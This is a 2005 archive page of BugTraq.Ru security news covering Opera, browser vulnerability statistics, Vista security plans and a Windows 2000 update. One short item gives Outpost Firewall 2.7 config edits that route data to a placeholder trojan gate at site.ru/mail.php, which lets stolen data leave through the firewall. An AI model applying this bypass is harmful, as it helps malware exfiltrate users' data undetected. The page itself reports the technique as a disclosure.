BugTraq.Ru: RSN

Russian Security Newsline
Хотите установить RSN на своем сайте?

Бесплатная Опера
dl // 20.09.05 12:09
Opera Software объявила о переходе к полностью бесплатному распространению своего броузера, из которого отныне удалены все баннеры.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/10.html]
За дополнительные деньги доступен Premium support.

Источник: пресс-релиз (via amirul)
теги: opera | обсудить | все отзывы (0)

IE оказался безопасней Mozilla, но атакуют его чаще
dl // 19.09.05 18:04
Как регулярно заявляет президент Mozilla Foundation Митчелл Бейкер (Mitchell Baker), броузеры семейства Mozilla принципиально более безопасны, чем IE, и не будут ощущать существенного роста проблем с расширением своей доли рынка.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/09.html]

Это согревает душу, однако не очень стыкуется с практикой - согласно отчету Symantec, за первое полугодие 2005 года в Mozilla было обнаружено 25 уязвимостей, подтвержденных производителем, 18 из которых получили статус крайне опасных. Аналогичные показатели для IE - 13 и 8 соответственно. Интервал между публикацией уязвимости и появлением использующего ее кода сократился в среднем до шести дней.

Впрочем, Symantec признала, что IE остается единственным броузером, на который осуществляются массовые атаки, отметив, что ожидает изменения картины по мере распространения альтернативных броузеров.

Источник: ZDNet
теги: symantec, mozilla, уязвимости | обсудить | все отзывы (12)

Безопасность в Vista: что нас ожидает
dl // 16.09.05 11:37
В четверг на MSDNовском чате вице-президент Microsoft Майк Нэш (Mike Nash) рассказал о некоторых нововведениях в Windows Vista с точки зрения безопасности.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/08.html]
Большие усилия прилагаются для защиты пользователей от вредоносных программ. Нэш подтвердил намерение MS дать всем пользователям Vista возможность использования технологии анти-spyware.

Интересным новшеством обещает стать защищенный режим в IE, при котором броузер будет изолирован от других процессов операционной системы и не будет иметь прав на запись за пределами каталога Temporary Internet Files, что должно снизить риск от "тихой" установки всевозможных вредоносных плагинов. Большинство объектов ActiveX будет по умолчанию запрещено; будет улучшен встроенный файрволл; будет продолжена работа по более аккуратному определению привилегий, необходимых для функционирования различных служб, начатая в Server 2003.

Наконец, в готовящуюся к выходу в ноябре Visual Studio 2005 будут включены многие средства, используемые внутри самой MS для написания более безопасного кода, в том числе интеграция с анализаторами кода PreFast и FxCop.

Источник: InformationWeek
теги: microsoft, spyware, vista, activex, windows, server | обсудить | все отзывы (0)

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH
обсудить | все отзывы (1)

Microsoft исправляет исправление Windows 2000
dl // 14.09.05 00:50
В минувшую пятницу Microsoft отозвала обещанное вторничное обновление, заявив, что для него потребуется дополнительное тестирование.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/06.html]
Вместо этого вышел обновленный вариант кумулятивного обновления Rollup 1 Windows 2000 Service Pack 4, первый вариант которого был выпущен в июне и вызвал проблемы у ряда пользователей.

Источник: ZDNet
теги: microsoft, windows, service pack | обсудить | все отзывы (9)

«« « 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 » »»

Предложить свою новость